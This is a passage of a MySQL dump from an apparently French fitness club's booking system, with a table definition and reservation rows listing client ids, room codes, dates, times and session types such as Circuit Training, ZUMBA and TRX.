(15554, 383, 'CTR', '2019-07-10', '19h00', '20h00', 'Circuit Training'),
(15555, 180, 'CTR', '2019-07-15', '19h30', '20h30', 'Circuit Training'),
(15556, 132, 'CTR', '2019-07-15', '19h30', '20h30', 'Circuit Training'),
(15557, 397, 'CTR', '2019-07-15', '19h30', '20h30', 'Circuit Training'),
(15558, 230, 'CTR', '2019-07-15', '19h30', '20h30', 'Circuit Training'),
(15559, 412, 'CTR', '2019-07-15', '19h30', '20h30', 'Circuit Training'),
(15560, 413, 'CTR', '2019-07-15', '19h30', '20h30', 'Circuit Training'),
(15575, 31, 'CTR', '2019-07-17', '18h00', '19h00', 'Circuit Training'),
(15576, 375, 'CTR', '2019-07-18', '18h30', '19h30', 'Circuit Training'),
(15577, 375, 'CTR', '2019-07-18', '18h30', '19h30', 'Circuit Training'),
(15578, 406, 'CTR', '2019-07-18', '18h30', '19h30', 'Circuit Training'),
(15579, 379, 'CTR', '2019-07-18', '19h30', '20h30', 'Circuit Training'),
(15580, 380, 'CTR', '2019-07-18', '19h30', '20h30', 'Circuit Training'),
(15581, 48, 'CTR', '2019-07-17', '18h00', '19h00', 'Circuit Training'),
(15582, 231, 'CTR', '2019-07-17', '18h00', '19h00', 'Circuit Training'),
(15583, 180, 'CTR', '2019-07-17', '18h00', '19h00', 'Circuit Training'),
(15584, 173, 'CTR', '2019-07-17', '19h00', '20h00', 'Circuit Training'),
(15585, 397, 'CTR', '2019-07-17', '19h00', '20h00', 'Circuit Training'),
(15612, 393, 'CTR', '2019-08-01', '18h30', '19h30', 'Circuit Training'),
(15659, 31, 'CTR', '2019-08-29', '18h30', '19h30', 'Circuit Training'),
(15624, 379, 'CTR', '2019-08-22', '19h30', '20h30', 'Circuit Training'),
(15621, 410, 'CTR', '2019-08-01', '18h30', '19h30', 'Circuit Training'),
(15655, 381, 'CTR', '2019-08-22', '19h30', '20h30', 'Circuit Training'),
(15615, 231, 'CTR', '2019-08-01', '18h30', '19h30', 'Circuit Training'),
(15617, 413, 'CTR', '2019-08-01', '18h30', '19h30', 'Circuit Training'),
(15618, 412, 'CTR', '2019-08-01', '18h30', '19h30', 'Circuit Training'),
(15628, 406, 'CTR', '2019-08-22', '18h30', '19h30', 'Circuit Training'),
(15660, 132, 'CTR', '2019-08-29', '18h30', '19h30', 'Circuit Training'),
(15630, 367, 'CTR', '2019-08-22', '18h30', '19h30', 'Circuit Training'),
(15657, 384, 'CTR', '2019-08-22', '19h30', '20h30', 'Circuit Training'),
(15632, 413, 'CTR', '2019-08-22', '19h30', '20h30', 'Circuit Training'),
(15651, 408, 'CTR', '2019-08-22', '19h30', '20h30', 'Circuit Training'),
(15652, 408, 'CTR', '2019-08-22', '19h30', '20h30', 'Circuit Training'),
(15658, 413, 'CTR', '2019-08-29', '18h30', '19h30', 'Circuit Training'),
(15653, 388, 'CTR', '2019-08-22', '18h30', '19h30', 'Circuit Training'),
(15654, 386, 'CTR', '2019-08-22', '18h30', '19h30', 'Circuit Training'),
(15639, 393, 'CTR', '2019-08-22', '18h30', '19h30', 'Circuit Training'),
(15643, 415, 'CTR', '2019-08-19', '17:15', '18:00', 'Natation'),
(15650, 132, 'CTR', '2019-08-22', '19h30', '20h30', 'Circuit Training'),
(15646, 230, 'CTR', '2019-08-22', '18h30', '19h30', 'Circuit Training'),
(15648, 31, 'CTR', '2019-08-22', '19h30', '20h30', 'Circuit Training');

-- --------------------------------------------------------

--
-- Structure de la table `reservation_reservation_bck`
--

CREATE TABLE `reservation_reservation_bck` (
  `id` int(11) NOT NULL,
  `id_client` int(11) NOT NULL,
  `id_salle` varchar(3) NOT NULL,
  `date` date NOT NULL,
  `heure_deb` varchar(5) NOT NULL,
  `heure_fin` varchar(5) NOT NULL,
  `type_seance` varchar(250) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `reservation_reservation_bck`
--

INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(429, 26, 'CTR', '2014-02-17', '18h15', '18h45', 'Circuit Training'),
(418, 4, 'CTR', '2014-02-10', '19h45', '20h45', 'ZUMBA'),
(373, 1, 'CTR', '2014-01-26', '11h00', '11h30', 'GLFE'),
(386, 3, 'CTR', '2014-02-07', '19h45', '20h15', 'Cardio'),
(376, 4, 'CTR', '2014-01-26', '11h00', '11h30', 'GLFE'),
(320, 3, 'CTR', '2014-01-20', '18h00', '18h30', 'TRX'),
(421, 12, 'CTR', '2014-02-10', '19h45', '20h45', 'ZUMBA'),
(378, 3, 'lim', '2014-02-06', '18h15', '18h45', 'Circuit training'),
(321, 4, 'CTR', '2014-01-20', '19h45', '20h15', 'Cardio'),
(322, 3, 'CTR', '2014-01-20', '18h30', '19h00', 'GLFE'),
(384, 3, 'CTR', '2014-02-05', '17h30', '18h00', 'RIP-KETTLE'),
(385, 3, 'CTR', '2014-02-05', '18h15', '18h45', 'Cardio'),
(393, 1, 'CTR', '2014-02-09', '11h45', '12h15', 'RIP-KETTLE'),
(379, 3, 'CTR', '2014-02-07', '17h30', '18h00', 'TRX'),
(380, 3, 'CTR', '2014-02-05', '18h00', '18h30', 'Circuit Training'),
(441, 29, 'CTR', '2014-02-19', '17h30', '18h00', 'Renforcement Musculaire'),
(426, 24, 'CTR', '2014-02-13', '18h00', '19h00', 'Duo Spécial Saint-Valentin (Séance 1)'),
(434, 21, 'CTR', '2014-02-17', '19h00', '19h30', 'Renforcement Musculaire'),
(371, 3, 'CTR', '2014-01-19', '11h00', '11h30', 'GLFE'),
(372, 4, 'CTR', '2014-01-19', '11h00', '11h30', 'GLFE'),
(417, 12, 'CTR', '2014-02-10', '19h45', '20h45', 'ZUMBA'),
(419, 12, 'CTR', '2014-02-10', '19h00', '19h30', 'Renforcement Musculaire'),
(415, 1, 'CTR', '2014-02-10', '18h15', '18h45', 'Circuit Training'),
(424, 14, 'CTR', '2014-02-16', '11h00', '11h30', 'Circuit Training'),
(423, 13, 'CTR', '2014-02-12', '17h30', '18h00', 'Renforcement Musculaire'),
(425, 17, 'CTR', '2014-02-13', '18h00', '19h00', 'Duo Spécial Saint-Valentin (Séance 1)'),
(486, 22, 'CTR', '2014-02-19', '18h15', '18h45', 'Cardio'),
(430, 26, 'CTR', '2014-02-19', '18h15', '18h45', 'Cardio'),
(431, 32, 'CTR', '2014-02-13', '19h00', '20h00', 'Duo spécial Saint-Valentin (Séance 2)'),
(432, 20, 'CTR', '2014-02-17', '19h00', '19h30', 'Renforcement Musculaire'),
(449, 20, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(450, 21, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(436, 44, 'CTR', '2014-02-14', '18h15', '18h45', 'Circuit Training'),
(437, 28, 'CTR', '2014-02-19', '17h30', '18h00', 'Renforcement Musculaire'),
(452, 28, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(451, 24, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(440, 30, 'CTR', '2014-02-14', '18h15', '18h45', 'Circuit Training'),
(453, 29, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(446, 49, 'CTR', '2014-02-15', '11h00', '11h30', 'TRX'),
(447, 18, 'CTR', '2014-02-15', '11h00', '11h30', 'TRX'),
(448, 4, 'CTR', '2014-02-17', '19h45', '20h45', 'ZUMBA'),
(454, 60, 'CTR', '2014-02-17', '19h00', '19h30', 'Renforcement Musculaire'),
(455, 62, 'CTR', '2014-02-17', '19h00', '19h30', 'Renforcement Musculaire'),
(456, 42, 'CTR', '2014-02-20', '19h45', '20h45', 'ZUMBA'),
(457, 42, 'CTR', '2014-02-25', '18h15', '18h45', 'TRX'),
(458, 41, 'CTR', '2014-02-18', '18h15', '18h45', 'TRX'),
(459, 41, 'CTR', '2014-02-20', '19h45', '20h45', 'ZUMBA'),
(460, 56, 'CTR', '2014-02-16', '11h00', '11h30', 'Circuit Training'),
(461, 44, 'CTR', '2014-02-18', '18h15', '18h45', 'TRX'),
(462, 44, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(463, 75, 'CTR', '2014-02-18', '17h30', '18h00', 'Cardio'),
(464, 49, 'CTR', '2014-02-16', '11h00', '11h30', 'Circuit Training'),
(465, 35, 'CTR', '2014-02-16', '11h00', '11h30', 'Circuit Training'),
(466, 35, 'CTR', '2014-02-18', '17h30', '18h00', 'Cardio'),
(467, 76, 'CTR', '2014-02-17', '17h30', '18h00', 'TRX'),
(468, 76, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(469, 17, 'CTR', '2014-02-17', '19h45', '20h45', 'ZUMBA'),
(470, 13, 'CTR', '2014-02-17', '17h30', '18h00', 'TRX'),
(471, 36, 'CTR', '2014-02-17', '19h00', '19h30', 'Renforcement Musculaire'),
(472, 27, 'CTR', '2014-02-17', '17h30', '18h00', 'TRX'),
(473, 48, 'CTR', '2014-02-17', '18h15', '18h45', 'Circuit Training'),
(474, 56, 'CTR', '2014-02-17', '18h15', '18h45', 'Circuit Training'),
(475, 51, 'CTR', '2014-02-19', '17h30', '18h00', 'Renforcement Musculaire'),
(476, 14, 'CTR', '2014-02-18', '17h30', '18h00', 'Cardio'),
(479, 18, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(480, 33, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(481, 40, 'CTR', '2014-02-18', '18h15', '18h45', 'TRX'),
(482, 40, 'CTR', '2014-02-20', '18h15', '18h45', 'Renforcement musculaire'),
(483, 40, 'CTR', '2014-02-25', '19h45', '20h15', 'Renforcement Musculaire'),
(484, 25, 'CTR', '2014-02-19', '18h15', '18h45', 'Cardio'),
(485, 31, 'CTR', '2014-02-19', '19h00', '19h30', 'TRX'),
(579, 35, 'CTR', '2014-02-25', '17h30', '18h00', 'Cardio'),
(488, 34, 'CTR', '2014-02-20', '17h30', '18h00', 'Circuit Training'),
(489, 35, 'CTR', '2014-02-23', '11h00', '11h30', 'Circuit Training'),
(490, 13, 'CTR', '2014-02-19', '18h15', '18h45', 'Cardio'),
(492, 32, 'CTR', '2014-02-20', '19h00', '19h30', 'Cardio'),
(493, 32, 'CTR', '2014-02-20', '19h45', '20h45', 'ZUMBA'),
(494, 41, 'CTR', '2014-02-20', '18h15', '18h45', 'Renforcement musculaire'),
(495, 41, 'CTR', '2014-02-20', '19h00', '19h30', 'Cardio'),
(496, 3, 'CTR', '2014-02-20', '18h15', '18h45', 'Renforcement musculaire'),
(497, 48, 'CTR', '2014-02-21', '18h15', '18h45', 'Circuit Training'),
(504, 56, 'CTR', '2014-02-22', '11h45', '12h15', 'Circuit Training'),
(499, 33, 'CTR', '2014-02-27', '17h30', '18h00', 'Circuit Training'),
(500, 47, 'CTR', '2014-02-21', '17h30', '18h00', 'TRX'),
(501, 63, 'CTR', '2014-02-21', '17h30', '18h00', 'TRX'),
(502, 28, 'CTR', '2014-02-27', '17h30', '18h00', 'Circuit Training'),
(503, 28, 'CTR', '2014-02-26', '17h30', '18h00', 'Renforcement Musculaire'),
(505, 56, 'CTR', '2014-02-24', '18h15', '18h45', 'Circuit Training'),
(506, 78, 'CTR', '2014-02-22', '11h00', '11h30', 'TRX'),
(507, 13, 'CTR', '2014-02-22', '11h00', '11h30', 'TRX'),
(508, 40, 'CTR', '2014-02-23', '11h00', '11h30', 'Circuit Training'),
(509, 42, 'CTR', '2014-02-23', '11h00', '11h30', 'Circuit Training'),
(548, 62, 'CTR', '2014-02-24', '19h00', '19h30', 'Renforcement Musculaire'),
(536, 14, 'CTR', '2014-02-23', '11h00', '11h30', 'Circuit Training'),
(537, 80, 'CTR', '2014-02-23', '11h00', '11h30', 'Circuit Training'),
(547, 60, 'CTR', '2014-02-24', '19h00', '19h30', 'Renforcement Musculaire'),
(549, 80, 'CTR', '2014-02-24', '19h00', '19h30', 'Renforcement Musculaire'),
(550, 80, 'CTR', '2014-02-24', '19h00', '19h30', 'Renforcement Musculaire'),
(551, 80, 'CTR', '2014-02-24', '19h00', '19h30', 'Renforcement Musculaire'),
(552, 4, 'CTR', '2014-02-24', '19h45', '20h45', 'ZUMBA'),
(553, 80, 'CTR', '2014-02-24', '19h00', '19h30', 'Renforcement Musculaire'),
(554, 81, 'CTR', '2014-02-24', '19h45', '20h45', 'ZUMBA'),
(555, 16, 'CTR', '2014-02-24', '19h45', '20h45', 'ZUMBA'),
(556, 80, 'CTR', '2014-02-24', '19h45', '20h45', 'ZUMBA'),
(557, 83, 'CTR', '2014-02-24', '19h45', '20h45', 'ZUMBA'),
(558, 80, 'CTR', '2014-02-25', '19h00', '19h30', 'Circuit Training'),
(559, 34, 'CTR', '2014-02-27', '17h30', '18h00', 'Circuit Training'),
(560, 36, 'CTR', '2014-02-24', '19h00', '19h30', 'Renforcement Musculaire'),
(570, 43, 'CTR', '2014-02-24', '19h00', '19h30', 'Renforcement Musculaire'),
(562, 17, 'CTR', '2014-02-24', '18h15', '18h45', 'Circuit Training'),
(563, 44, 'CTR', '2014-02-25', '18h15', '18h45', 'TRX'),
(564, 44, 'CTR', '2014-02-28', '18h15', '18h45', 'Circuit Training'),
(565, 44, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(567, 44, 'CTR', '2014-03-14', '18h15', '18h45', 'Circuit Training'),
(568, 32, 'CTR', '2014-02-24', '19h45', '20h45', 'ZUMBA'),
(587, 76, 'CTR', '2014-02-25', '17h30', '18h00', 'Cardio'),
(571, 43, 'CTR', '2014-02-24', '19h45', '20h45', 'ZUMBA'),
(572, 42, 'CTR', '2014-02-27', '19h45', '20h45', 'ZUMBA'),
(573, 41, 'CTR', '2014-02-25', '18h15', '18h45', 'TRX'),
(574, 41, 'CTR', '2014-02-27', '19h45', '20h45', 'ZUMBA'),
(575, 14, 'CTR', '2014-02-25', '18h15', '18h45', 'TRX'),
(576, 75, 'CTR', '2014-02-25', '18h15', '18h45', 'TRX'),
(577, 43, 'CTR', '2014-02-26', '19h45', '20h15', 'Circuit Training'),
(586, 17, 'CTR', '2014-02-25', '17h30', '18h00', 'Cardio'),
(580, 35, 'CTR', '2014-02-25', '18h15', '18h45', 'TRX'),
(581, 35, 'CTR', '2014-02-27', '17h30', '18h00', 'Circuit Training'),
(582, 24, 'CTR', '2014-02-25', '17h30', '18h00', 'Cardio'),
(583, 24, 'CTR', '2014-02-25', '18h15', '18h45', 'TRX'),
(584, 24, 'CTR', '2014-02-27', '18h15', '18h45', 'Renforcement musculaire'),
(585, 24, 'CTR', '2014-02-27', '17h30', '18h00', 'Circuit Training'),
(588, 21, 'CTR', '2014-02-27', '18h15', '18h45', 'Renforcement musculaire'),
(589, 20, 'CTR', '2014-02-27', '18h15', '18h45', 'Renforcement musculaire'),
(590, 20, 'CTR', '2014-03-03', '19h00', '19h30', 'Renforcement Musculaire'),
(591, 21, 'CTR', '2014-03-03', '19h00', '19h30', 'Renforcement Musculaire'),
(592, 80, 'CTR', '2014-02-26', '19h00', '19h30', 'TRX'),
(593, 84, 'CTR', '2014-02-26', '17h30', '18h00', 'Renforcement Musculaire'),
(594, 31, 'CTR', '2014-02-26', '19h45', '20h15', 'Circuit Training'),
(595, 85, 'lim', '2014-02-26', '19h30', '20h00', 'Renforcement musculaire'),
(596, 13, 'CTR', '2014-02-27', '17h30', '18h00', 'Circuit Training'),
(597, 51, 'CTR', '2014-02-26', '17h30', '18h00', 'Renforcement Musculaire'),
(598, 29, 'CTR', '2014-02-26', '17h30', '18h00', 'Renforcement Musculaire'),
(599, 14, 'CTR', '2014-02-27', '19h00', '19h30', 'Cardio'),
(600, 17, 'CTR', '2014-02-27', '19h45', '20h45', 'ZUMBA'),
(601, 76, 'CTR', '2014-02-27', '17h30', '18h00', 'Circuit Training'),
(602, 56, 'CTR', '2014-02-28', '18h15', '18h45', 'Circuit Training'),
(603, 56, 'CTR', '2014-03-03', '18h15', '18h45', 'Circuit Training'),
(604, 32, 'CTR', '2014-02-27', '19h00', '19h30', 'Cardio'),
(605, 32, 'CTR', '2014-02-27', '19h45', '20h45', 'ZUMBA'),
(606, 51, 'CTR', '2014-02-27', '17h30', '18h00', 'Circuit Training'),
(607, 49, 'CTR', '2014-02-27', '18h15', '18h45', 'Renforcement musculaire'),
(608, 77, 'CTR', '2014-02-27', '18h15', '18h45', 'Renforcement musculaire'),
(609, 40, 'CTR', '2014-02-27', '18h15', '18h45', 'Renforcement musculaire'),
(610, 48, 'CTR', '2014-02-28', '18h15', '18h45', 'Circuit Training'),
(611, 31, 'CTR', '2014-02-28', '18h15', '18h45', 'Circuit Training'),
(612, 28, 'CTR', '2014-03-06', '17h30', '18h00', 'Circuit Training'),
(615, 28, 'CTR', '2014-03-12', '17h30', '18h00', 'Renforcement Musculaire'),
(614, 28, 'CTR', '2014-03-05', '17h30', '18h00', 'Renforcement Musculaire'),
(616, 28, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(617, 18, 'CTR', '2014-03-04', '17h30', '18h00', 'Cardio'),
(618, 18, 'CTR', '2014-03-06', '17h30', '18h00', 'Circuit Training'),
(619, 44, 'CTR', '2014-03-07', '18h15', '18h45', 'Circuit Training'),
(637, 80, 'CTR', '2014-03-03', '18h15', '18h45', 'Circuit Training'),
(635, 62, 'CTR', '2014-03-10', '19h00', '19h30', 'Renforcement Musculaire'),
(636, 60, 'CTR', '2014-03-10', '19h00', '19h30', 'Renforcement Musculaire'),
(651, 27, 'CTR', '2014-03-03', '18h15', '18h45', 'Circuit Training'),
(633, 4, 'CTR', '2014-03-06', '19h45', '20h45', 'ZUMBA'),
(634, 81, 'CTR', '2014-03-03', '19h45', '20h45', 'ZUMBA'),
(638, 80, 'CTR', '2014-03-03', '19h00', '19h30', 'Renforcement Musculaire'),
(639, 88, 'CTR', '2014-03-03', '19h00', '19h30', 'Renforcement Musculaire'),
(640, 87, 'CTR', '2014-03-03', '19h00', '19h30', 'Renforcement Musculaire'),
(641, 89, 'CTR', '2014-03-03', '19h00', '19h30', 'Renforcement Musculaire'),
(642, 80, 'CTR', '2014-03-03', '19h00', '19h30', 'Renforcement Musculaire'),
(643, 48, 'CTR', '2014-03-03', '18h15', '18h45', 'Circuit Training'),
(644, 35, 'CTR', '2014-03-04', '17h30', '18h00', 'Cardio'),
(645, 35, 'CTR', '2014-03-06', '17h30', '18h00', 'Circuit Training'),
(646, 35, 'CTR', '2014-03-06', '18h15', '18h45', 'Renforcement musculaire'),
(695, 35, 'CTR', '2014-03-11', '17h30', '18h00', 'Cardio'),
(648, 13, 'CTR', '2014-03-04', '17h30', '18h00', 'Cardio'),
(649, 30, 'CTR', '2014-03-03', '18h15', '18h45', 'Circuit Training'),
(650, 30, 'CTR', '2014-03-03', '19h45', '20h45', 'ZUMBA'),
(652, 32, 'CTR', '2014-03-03', '19h45', '20h45', 'ZUMBA'),
(653, 16, 'CTR', '2014-03-03', '19h45', '20h45', 'ZUMBA'),
(654, 41, 'CTR', '2014-03-03', '19h45', '20h45', 'ZUMBA'),
(655, 76, 'CTR', '2014-03-04', '17h30', '18h00', 'Cardio'),
(656, 76, 'CTR', '2014-03-06', '17h30', '18h00', 'Circuit Training'),
(657, 83, 'CTR', '2014-03-06', '19h45', '20h45', 'ZUMBA'),
(658, 41, 'CTR', '2014-03-04', '18h15', '18h45', 'TRX'),
(659, 40, 'CTR', '2014-03-04', '18h15', '18h45', 'TRX'),
(660, 40, 'CTR', '2014-03-06', '18h15', '18h45', 'Renforcement musculaire'),
(661, 13, 'CTR', '2014-03-06', '17h30', '18h00', 'Circuit Training'),
(662, 41, 'CTR', '2014-03-06', '19h45', '20h45', 'ZUMBA'),
(663, 25, 'CTR', '2014-03-05', '18h15', '18h45', 'Cardio'),
(664, 51, 'CTR', '2014-03-05', '17h30', '18h00', 'Renforcement Musculaire'),
(665, 53, 'CTR', '2014-03-05', '18h15', '18h45', 'Cardio'),
(666, 54, 'CTR', '2014-03-05', '18h15', '18h45', 'Cardio'),
(667, 80, 'CTR', '2014-03-05', '18h15', '18h45', 'Cardio'),
(668, 29, 'CTR', '2014-03-05', '17h30', '18h00', 'Renforcement Musculaire'),
(669, 29, 'CTR', '2014-03-06', '17h30', '18h00', 'Circuit Training'),
(670, 20, 'CTR', '2014-03-06', '18h15', '18h45', 'Renforcement musculaire'),
(671, 21, 'CTR', '2014-03-06', '18h15', '18h45', 'Renforcement musculaire'),
(672, 14, 'CTR', '2014-03-06', '19h00', '19h30', 'Cardio'),
(673, 80, 'CTR', '2014-03-07', '18h15', '18h45', 'Circuit Training'),
(674, 80, 'CTR', '2014-03-07', '18h15', '18h45', 'Circuit Training'),
(675, 56, 'CTR', '2014-03-06', '18h15', '18h45', 'Renforcement musculaire'),
(676, 43, 'CTR', '2014-03-06', '18h15', '18h45', 'Renforcement musculaire'),
(677, 24, 'CTR', '2014-03-06', '17h30', '18h00', 'Circuit Training'),
(678, 24, 'CTR', '2014-03-06', '18h15', '18h45', 'Renforcement musculaire'),
(679, 17, 'CTR', '2014-03-06', '19h00', '19h30', 'Cardio'),
(680, 17, 'CTR', '2014-03-06', '19h45', '20h45', 'ZUMBA'),
(681, 17, 'CTR', '2014-03-06', '19h45', '20h45', 'ZUMBA'),
(682, 21, 'CTR', '2014-03-10', '19h00', '19h30', 'Renforcement Musculaire'),
(683, 21, 'CTR', '2014-03-13', '18h15', '18h45', 'Renforcement musculaire'),
(684, 20, 'CTR', '2014-03-10', '19h00', '19h30', 'Renforcement Musculaire'),
(685, 20, 'CTR', '2014-03-13', '18h15', '18h45', 'Renforcement musculaire'),
(686, 48, 'CTR', '2014-03-07', '18h15', '18h45', 'Circuit Training'),
(687, 31, 'CTR', '2014-03-07', '18h15', '18h45', 'Circuit Training'),
(688, 81, 'CTR', '2014-03-07', '18h15', '18h45', 'Circuit Training'),
(689, 82, 'CTR', '2014-03-07', '18h15', '18h45', 'Circuit Training'),
(691, 41, 'CTR', '2014-03-10', '19h45', '20h45', 'ZUMBA'),
(692, 80, 'CTR', '2014-03-08', '11h00', '11h30', 'TRX'),
(693, 80, 'CTR', '2014-03-08', '11h00', '11h30', 'TRX'),
(694, 49, 'CTR', '2014-03-08', '11h00', '11h30', 'TRX'),
(696, 35, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(697, 61, 'CTR', '2014-03-11', '17h30', '18h00', 'Cardio'),
(698, 61, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(699, 14, 'CTR', '2014-03-09', '11h00', '11h30', 'Circuit Training'),
(700, 81, 'CTR', '2014-03-09', '11h00', '11h30', 'Circuit Training'),
(701, 82, 'CTR', '2014-03-09', '11h00', '11h30', 'Circuit Training'),
(702, 32, 'CTR', '2014-03-09', '11h00', '11h30', 'Circuit Training'),
(703, 56, 'CTR', '2014-03-09', '11h00', '11h30', 'Circuit Training'),
(704, 87, 'CTR', '2014-03-10', '19h00', '19h30', 'Renforcement Musculaire'),
(705, 88, 'CTR', '2014-03-10', '19h00', '19h30', 'Renforcement Musculaire'),
(706, 86, 'CTR', '2014-03-10', '18h15', '18h45', 'Circuit Training'),
(707, 89, 'CTR', '2014-03-10', '19h00', '19h30', 'Renforcement Musculaire'),
(708, 48, 'CTR', '2014-03-10', '18h15', '18h45', 'Circuit Training'),
(709, 22, 'CTR', '2014-03-12', '18h15', '18h45', 'Cardio'),
(710, 81, 'CTR', '2014-03-10', '19h45', '20h45', 'ZUMBA'),
(711, 16, 'CTR', '2014-03-10', '19h45', '20h45', 'ZUMBA'),
(712, 24, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(713, 24, 'CTR', '2014-03-13', '18h15', '18h45', 'Renforcement musculaire'),
(714, 17, 'CTR', '2014-03-10', '19h45', '20h45', 'ZUMBA'),
(715, 30, 'CTR', '2014-03-10', '18h15', '18h45', 'Circuit Training'),
(716, 30, 'CTR', '2014-03-10', '19h45', '20h45', 'ZUMBA'),
(717, 13, 'CTR', '2014-03-11', '17h30', '18h00', 'Cardio'),
(718, 23, 'CTR', '2014-03-10', '19h45', '20h45', 'ZUMBA'),
(719, 4, 'CTR', '2014-03-10', '19h45', '20h45', 'ZUMBA'),
(720, 41, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(755, 40, 'CTR', '2014-03-11', '17h30', '18h00', 'Cardio'),
(749, 14, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(754, 36, 'CTR', '2014-03-11', '19h00', '19h30', 'Circuit Training'),
(756, 40, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(757, 40, 'CTR', '2014-03-13', '18h15', '18h45', 'Renforcement musculaire'),
(758, 40, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(759, 40, 'CTR', '2014-03-16', '11h45', '12h15', 'Renforcement Musculaire'),
(760, 40, 'CTR', '2014-03-18', '17h30', '18h00', 'Cardio'),
(761, 40, 'CTR', '2014-03-18', '18h15', '18h45', 'TRX'),
(762, 24, 'CTR', '2014-03-11', '17h30', '18h00', 'Cardio'),
(763, 4, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(764, 3, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(765, 16, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(766, 82, 'CTR', '2014-03-11', '18h15', '18h45', 'TRX'),
(767, 37, 'CTR', '2014-03-11', '19h00', '19h30', 'Circuit Training'),
(768, 38, 'CTR', '2014-03-11', '19h00', '19h30', 'Circuit Training'),
(769, 90, 'CTR', '2014-03-12', '18h15', '18h45', 'Cardio'),
(770, 47, 'CTR', '2014-03-14', '17h30', '18h00', 'TRX'),
(771, 31, 'CTR', '2014-03-12', '18h15', '18h45', 'Cardio'),
(772, 38, 'CTR', '2014-03-12', '19h00', '19h30', 'TRX'),
(773, 37, 'CTR', '2014-03-12', '17h30', '18h00', 'Renforcement Musculaire'),
(777, 41, 'CTR', '2014-03-13', '19h45', '20h45', 'ZUMBA'),
(778, 85, 'lim', '2014-03-12', '19h30', '20h00', 'Renforcement musculaire'),
(779, 69, 'CTR', '2014-03-12', '18h15', '18h45', 'Cardio'),
(780, 43, 'CTR', '2014-03-13', '19h00', '19h30', 'Cardio'),
(781, 43, 'CTR', '2014-03-13', '19h45', '20h45', 'ZUMBA'),
(782, 68, 'CTR', '2014-03-12', '17h30', '18h00', 'Renforcement Musculaire'),
(783, 18, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(784, 18, 'CTR', '2014-03-15', '11h00', '11h30', 'TRX'),
(787, 29, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(786, 29, 'CTR', '2014-03-12', '17h30', '18h00', 'Renforcement Musculaire'),
(788, 51, 'CTR', '2014-03-12', '17h30', '18h00', 'Renforcement Musculaire'),
(789, 37, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(797, 76, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(791, 53, 'CTR', '2014-03-12', '18h15', '18h45', 'Cardio'),
(792, 54, 'CTR', '2014-03-12', '18h15', '18h45', 'Cardio'),
(793, 4, 'CTR', '2014-03-13', '19h45', '20h45', 'ZUMBA'),
(794, 17, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(795, 14, 'CTR', '2014-03-13', '19h00', '19h30', 'Cardio'),
(796, 68, 'CTR', '2014-03-13', '17h30', '18h00', 'Circuit Training'),
(798, 83, 'CTR', '2014-03-13', '19h45', '20h45', 'ZUMBA'),
(799, 92, 'CTR', '2014-03-15', '11h45', '12h15', 'Circuit Training'),
(800, 48, 'CTR', '2014-03-14', '18h15', '18h45', 'Circuit Training'),
(801, 31, 'CTR', '2014-03-14', '18h15', '18h45', 'Circuit Training'),
(802, 44, 'CTR', '2014-03-18', '19h00', '19h30', 'Circuit Training'),
(877, 80, 'CTR', '2014-03-22', '11h00', '11h30', 'TRX'),
(804, 56, 'CTR', '2014-03-14', '18h15', '18h45', 'Circuit Training'),
(805, 63, 'CTR', '2014-03-14', '17h30', '18h00', 'TRX'),
(806, 28, 'CTR', '2014-03-19', '17h30', '18h00', 'Renforcement Musculaire'),
(808, 78, 'CTR', '2014-03-15', '11h00', '11h30', 'TRX'),
(809, 14, 'CTR', '2014-03-16', '11h00', '11h30', 'Circuit Training'),
(810, 32, 'CTR', '2014-03-16', '11h00', '11h30', 'Circuit Training'),
(811, 49, 'CTR', '2014-03-16', '11h00', '11h30', 'Circuit Training'),
(812, 88, 'CTR', '2014-03-17', '19h00', '19h30', 'Renforcement Musculaire'),
(813, 87, 'CTR', '2014-03-17', '19h00', '19h30', 'Renforcement Musculaire'),
(814, 89, 'CTR', '2014-03-17', '19h00', '19h30', 'Renforcement Musculaire'),
(815, 93, 'CTR', '2014-03-17', '19h00', '19h30', 'Renforcement Musculaire'),
(816, 80, 'CTR', '2014-03-17', '18h15', '18h45', 'Circuit Training'),
(817, 80, 'CTR', '2014-03-17', '18h15', '18h45', 'Circuit Training'),
(818, 86, 'CTR', '2014-03-17', '18h15', '18h45', 'Circuit Training'),
(819, 48, 'CTR', '2014-03-17', '18h15', '18h45', 'Circuit Training'),
(820, 60, 'CTR', '2014-03-17', '19h00', '19h30', 'Renforcement Musculaire'),
(821, 32, 'CTR', '2014-03-17', '19h45', '20h45', 'ZUMBA'),
(847, 19, 'CTR', '2014-03-18', '17h30', '18h00', 'Cardio'),
(823, 81, 'CTR', '2014-03-17', '19h45', '20h45', 'ZUMBA'),
(824, 30, 'CTR', '2014-03-17', '18h15', '18h45', 'Circuit Training'),
